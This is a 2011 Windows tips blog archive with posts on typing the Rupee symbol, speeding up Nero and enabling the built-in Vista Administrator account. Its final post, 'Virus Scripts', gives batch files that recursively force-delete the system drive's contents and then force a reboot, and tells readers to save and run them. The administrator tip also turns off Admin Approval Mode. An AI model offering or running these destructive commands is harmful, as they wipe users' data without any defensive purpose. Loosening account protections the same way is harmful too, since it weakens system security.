Archive

Archive for April, 2011

>Indian Rupee Symbol using Windows Fonts

April 20, 2011 Leave a comment

>The India Rupee symbol is now part of the official Unicode standard but for you to type that new currency sign into your favorite word processor or spreadsheet using a regular keyboard, your existing fonts must be updated to the new standard as well.

Microsoft has recently updated all the common fonts the ship with Windows to include support for the new Indian Rupee symbol. Now you can open a document inside Microsoft Word (or notepad), select a popular font family like Arial or Times New Roman, and type the Rupee sign directly.

Update your existing Windows fonts by installing the kb2496898 hotfix available for both Windows Vista and Windows 7. Once installed, this will update the Arial.ttf, Times.ttf, Tahoma.ttf and some of the other font files on your computer with the latest version.

How to Type the Indian Rupee Symbol using Arial

Launch Microsoft Word, change the document font to Arial or Tahoma, and type 20B9 followed by Alt-x. If the 20b9 string is converted into a Rupee symbol, as in the screenshot above, the update has been successfully applied.

~

Categories: MS Office

>Boost Nero in XP

April 10, 2011 Leave a comment

>Speed up Nero in XP

Go to “administrative tools” in the control panel, and in the “services” list, disable the IMAPI CD-Burning COM service.
(Note: manual setting is not enough it must be disabled) It is the built-in CD-burning capability for windowsXP.
Once it is disabled, Nero will start up much quicker.

~

Categories: Hacks, Windows XP

>Enable Administrator Account

April 8, 2011 Leave a comment

>In Windows Vista there is a Built-in Administrator Account in addition to your normal Administrator account that was created. The Built-in Administrator Account is disabled by default.

Certain Programs/Softwares give us trouble in proper installation due to this disable. Even though we run the .exe file of the programs that is to be installed as “Run As Administrator”. For proper installation of the programs it is to be enabled.

• Click Start, and type “secpol.msc” in the search area and click Enter.
• You may receive a prompt from UAC, approve/login and proceed.
• In the left list, choose “Local Policies”, then “Security Options
• Set “Accounts: Administrator account status” to Enabled.
• Set “User Account Control: Admin Approval Mode for the Built-in Administrator account” to Disabled.
• Now log-off, and you’ll see a new account named “Administrator” will be available, click on it to login.

Log on to this administrator account. You may delete other user accounts.

~

Categories: Vista

>Virus Scripts

April 2, 2011 Leave a comment

>1.This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.

2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save The Above Code with .bat extension & Run.

3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.

Note: Won’t work on Vista or Win7 as you need to bypass UAC.

~

Categories: Virus